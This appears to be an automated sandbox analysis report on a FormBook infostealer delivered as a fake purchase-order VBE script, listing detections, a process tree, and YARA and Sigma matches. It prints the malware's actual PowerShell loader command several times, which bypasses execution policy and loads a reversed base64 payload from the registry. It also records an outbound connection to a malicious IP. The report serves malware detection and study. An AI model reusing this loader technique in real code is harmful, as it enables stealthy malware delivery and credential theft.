Edit tour

Windows Analysis Report
Urgent Purchase Order.vbe

Overview

General Information

Sample name:	Urgent Purchase Order.vbe
Analysis ID:	1638545
MD5:	4f31f52ed22aa28e1bb66a09452fad8f
SHA1:	3afa8d5ed911802948197363113fca2fb117b9b3
SHA256:	a02b72fb503654f79b6cc19f588f5a65997aaa28a1029c969849750517d82545
Tags:	vbeuser-James_inthe_box
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains potential unpacker

Bypasses PowerShell execution policy

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Potential evasive VBS script found (sleep loop)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Windows Shell Script Host drops VBS files

Writes or reads registry keys via WMI

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7772 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)

WmiPrvSE.exe (PID: 1812 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 8460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

RNDzmzHPyfZMe3si.exe (PID: 6844 cmdline: "C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\IUrm4tIZbI.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

xcopy.exe (PID: 8920 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)

firefox.exe (PID: 7684 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

wscript.exe (PID: 1292 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\LKeZAYNmpVLnixJ.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 6524 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 9104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 9112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 7836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 1936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 2224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 3956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 3232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 5296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 4948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 8784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 1500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 8184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 8728 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 2680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 9084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 2544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 6820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 6680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 7268 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

powershell.exe (PID: 7576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 8060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

rundll32.exe (PID: 8288 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.3719481348.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.3742236502.00000000088B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.1556677119.00000000009B0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.1563636022.0000000007ED0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.3724227677.0000000003300000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.3724379961.0000000003350000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.3726655209.0000000004F20000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.1563569316.0000000005680000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 3180	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1e96:$b2: ::FromBase64String( 0x1fdc:$b2: ::FromBase64String( 0x3388:$b2: ::FromBase64String( 0x426b:$b2: ::FromBase64String( 0x43b1:$b2: ::FromBase64String( 0x56bd:$b2: ::FromBase64String( 0xdaeb:$b2: ::FromBase64String( 0x193d9:$b2: ::FromBase64String( 0x1951f:$b2: ::FromBase64String( 0x19b8b:$b2: ::FromBase64String( 0x19e6f:$b2: ::FromBase64String( 0x19fc0:$b2: ::FromBase64String( 0x1aa28:$b2: ::FromBase64String( 0x1ab6e:$b2: ::FromBase64String( 0x55b1d:$b2: ::FromBase64String( 0x577e6:$b2: ::FromBase64String( 0x1eaa:$s1: -join 0x1ff0:$s1: -join 0x339c:$s1: -join 0x427f:$s1: -join 0x43c5:$s1: -join
Process Memory Space: powershell.exe PID: 9104	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf6a80:$b2: ::FromBase64String( 0xf874e:$b2: ::FromBase64String( 0xf8894:$b2: ::FromBase64String( 0xf9055:$b2: ::FromBase64String( 0xfa049:$b2: ::FromBase64String( 0xfa135:$b2: ::FromBase64String( 0xfb043:$b2: ::FromBase64String( 0x102c5b:$b2: ::FromBase64String( 0x10dcb5:$b2: ::FromBase64String( 0x112e5e:$b2: ::FromBase64String( 0x112fa4:$b2: ::FromBase64String( 0x1193f9:$b2: ::FromBase64String( 0x11968c:$b2: ::FromBase64String( 0x1197dd:$b2: ::FromBase64String( 0xf6a94:$s1: -join 0xf8762:$s1: -join 0xf88a8:$s1: -join 0xf9069:$s1: -join 0xfa05d:$s1: -join 0xfa149:$s1: -join 0xfb057:$s1: -join
Process Memory Space: powershell.exe PID: 1936	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1d33:$b2: ::FromBase64String( 0x1e79:$b2: ::FromBase64String( 0x3bbc:$b2: ::FromBase64String( 0x3c5c:$b2: ::FromBase64String( 0x80ea:$b2: ::FromBase64String( 0x96af:$b2: ::FromBase64String( 0x9969:$b2: ::FromBase64String( 0x9aba:$b2: ::FromBase64String( 0xa875:$b2: ::FromBase64String( 0x1235e:$b2: ::FromBase64String( 0x1d66e:$b2: ::FromBase64String( 0x1d7b4:$b2: ::FromBase64String( 0x14a58a:$b2: ::FromBase64String( 0x15f480:$b2: ::FromBase64String( 0x15f5c6:$b2: ::FromBase64String( 0x1d47:$s1: -join 0x1e8d:$s1: -join 0x3bd0:$s1: -join 0x3c70:$s1: -join 0x80fe:$s1: -join 0x96c3:$s1: -join
Process Memory Space: powershell.exe PID: 3956	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x12e135:$b2: ::FromBase64String( 0x135d5a:$b2: ::FromBase64String( 0x12e149:$s1: -join 0x135d6e:$s1: -join 0x146127:$s1: -join 0x152201:$s1: -join 0x1159c3:$s3: Reverse 0x116832:$s3: Reverse 0x10189b:$s4: += 0x1473cc:$s4: += 0x149a67:$s4: += 0x149ae6:$s4: += 0x149d01:$s4: += 0x149d84:$s4: += 0x14a7de:$s4: += 0x14abd7:$s4: += 0x14eab8:$s4: += 0x14ead7:$s4: += 0x14eb12:$s4: += 0x14eb2f:$s4: += 0x14eb6a:$s4: +=
Process Memory Space: powershell.exe PID: 5296	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x100120:$b2: ::FromBase64String( 0x1008d6:$b2: ::FromBase64String( 0x100a1c:$b2: ::FromBase64String( 0x144c86:$b2: ::FromBase64String( 0x14cb19:$b2: ::FromBase64String( 0x15a676:$b2: ::FromBase64String( 0x15a6ba:$b2: ::FromBase64String( 0x15bc43:$b2: ::FromBase64String( 0x15bd89:$b2: ::FromBase64String( 0x15c611:$b2: ::FromBase64String( 0x15f1fe:$b2: ::FromBase64String( 0x15f344:$b2: ::FromBase64String( 0x1606ad:$b2: ::FromBase64String( 0x16093d:$b2: ::FromBase64String( 0xf3dc1:$s1: -join 0xf5612:$s1: -join 0x100134:$s1: -join 0x1008ea:$s1: -join 0x100a30:$s1: -join 0x144c9a:$s1: -join 0x14cb2d:$s1: -join
Process Memory Space: powershell.exe PID: 8784	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xa0c:$b2: ::FromBase64String( 0x55fe:$b2: ::FromBase64String( 0x5744:$b2: ::FromBase64String( 0x7ac4:$b2: ::FromBase64String( 0x1395af:$b2: ::FromBase64String( 0x1396ce:$b2: ::FromBase64String( 0x13dc93:$b2: ::FromBase64String( 0x153b7b:$b2: ::FromBase64String( 0x15b781:$b2: ::FromBase64String( 0x1673fc:$b2: ::FromBase64String( 0x167542:$b2: ::FromBase64String( 0x168218:$b2: ::FromBase64String( 0x168523:$b2: ::FromBase64String( 0x168674:$b2: ::FromBase64String( 0xa20:$s1: -join 0x5612:$s1: -join 0x5758:$s1: -join 0x7ad8:$s1: -join 0x1395c3:$s1: -join 0x1396e2:$s1: -join 0x13dca7:$s1: -join
Process Memory Space: powershell.exe PID: 8184	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x530:$b2: ::FromBase64String( 0x83c0:$b2: ::FromBase64String( 0x6e8ef:$b2: ::FromBase64String( 0x6ec42:$b2: ::FromBase64String( 0x6fbce:$b2: ::FromBase64String( 0x6fd14:$b2: ::FromBase64String( 0x73066:$b2: ::FromBase64String( 0x16c6da:$b2: ::FromBase64String( 0x16c820:$b2: ::FromBase64String( 0x16d5af:$b2: ::FromBase64String( 0x544:$s1: -join 0x83d4:$s1: -join 0x5fa68:$s1: -join 0x6c52c:$s1: -join 0x6e903:$s1: -join 0x6ec56:$s1: -join 0x6fbe2:$s1: -join 0x6fd28:$s1: -join 0x7307a:$s1: -join 0x16c6ee:$s1: -join 0x16c834:$s1: -join
Process Memory Space: powershell.exe PID: 2680	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2a87:$b2: ::FromBase64String( 0x2bcd:$b2: ::FromBase64String( 0x32ec:$b2: ::FromBase64String( 0x393c:$b2: ::FromBase64String( 0x3a82:$b2: ::FromBase64String( 0x10990b:$b2: ::FromBase64String( 0x109a51:$b2: ::FromBase64String( 0x10a4a3:$b2: ::FromBase64String( 0x10a5e9:$b2: ::FromBase64String( 0x10e7b7:$b2: ::FromBase64String( 0x1133c0:$b2: ::FromBase64String( 0x14e332:$b2: ::FromBase64String( 0x155f50:$b2: ::FromBase64String( 0x160fee:$b2: ::FromBase64String( 0x164299:$b2: ::FromBase64String( 0x164591:$b2: ::FromBase64String( 0x1646e2:$b2: ::FromBase64String( 0x2a9b:$s1: -join 0x2be1:$s1: -join 0x3300:$s1: -join 0x3950:$s1: -join
Process Memory Space: powershell.exe PID: 2544	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4df1:$b2: ::FromBase64String( 0xe6e8e:$b2: ::FromBase64String( 0xe6fd4:$b2: ::FromBase64String( 0xe8143:$b2: ::FromBase64String( 0xe82d6:$b2: ::FromBase64String( 0xe8718:$b2: ::FromBase64String( 0x14cebf:$b2: ::FromBase64String( 0x14d186:$b2: ::FromBase64String( 0x14d2d7:$b2: ::FromBase64String( 0x14df41:$b2: ::FromBase64String( 0x14e087:$b2: ::FromBase64String( 0x1505f9:$b2: ::FromBase64String( 0x15073f:$b2: ::FromBase64String( 0x151b59:$b2: ::FromBase64String( 0x159750:$b2: ::FromBase64String( 0x4e05:$s1: -join 0xe6ea2:$s1: -join 0xe6fe8:$s1: -join 0xe8157:$s1: -join 0xe82ea:$s1: -join 0xe872c:$s1: -join
Process Memory Space: powershell.exe PID: 6680	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x622:$b2: ::FromBase64String( 0x768:$b2: ::FromBase64String( 0x1742:$b2: ::FromBase64String( 0x1888:$b2: ::FromBase64String( 0x472b:$b2: ::FromBase64String( 0xf9e2d:$b2: ::FromBase64String( 0x116c97:$b2: ::FromBase64String( 0x116ddd:$b2: ::FromBase64String( 0x11a966:$b2: ::FromBase64String( 0x11ac01:$b2: ::FromBase64String( 0x154a86:$b2: ::FromBase64String( 0x15c5ea:$b2: ::FromBase64String( 0x17193c:$b2: ::FromBase64String( 0x636:$s1: -join 0x77c:$s1: -join 0x1756:$s1: -join 0x189c:$s1: -join 0x473f:$s1: -join 0xf9e41:$s1: -join 0x10d08f:$s1: -join 0x1134cf:$s1: -join
Process Memory Space: powershell.exe PID: 7576	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf70be:$b2: ::FromBase64String( 0xf8566:$b2: ::FromBase64String( 0xf88bb:$b2: ::FromBase64String( 0xfeec6:$b2: ::FromBase64String( 0xff00c:$b2: ::FromBase64String( 0x100bdb:$b2: ::FromBase64String( 0x145789:$b2: ::FromBase64String( 0x14d368:$b2: ::FromBase64String( 0x15b505:$b2: ::FromBase64String( 0x15ec60:$b2: ::FromBase64String( 0x15eda6:$b2: ::FromBase64String( 0xf70d2:$s1: -join 0xf857a:$s1: -join 0xf88cf:$s1: -join 0xfeeda:$s1: -join 0xff020:$s1: -join 0x100bef:$s1: -join 0x14579d:$s1: -join 0x14d37c:$s1: -join 0x15b519:$s1: -join 0x15ec74:$s1: -join
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.vbc.exe.9b0000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
13.2.vbc.exe.9b0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7772, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), ProcessId: 3180, ProcessName: powershell.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 144.91.92.251, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7772, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49721

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", ProcessId: 7772, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7772, TargetFilename: C:\Users\user\AppData\Roaming\LKeZAYNmpVLnixJ.vbs

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

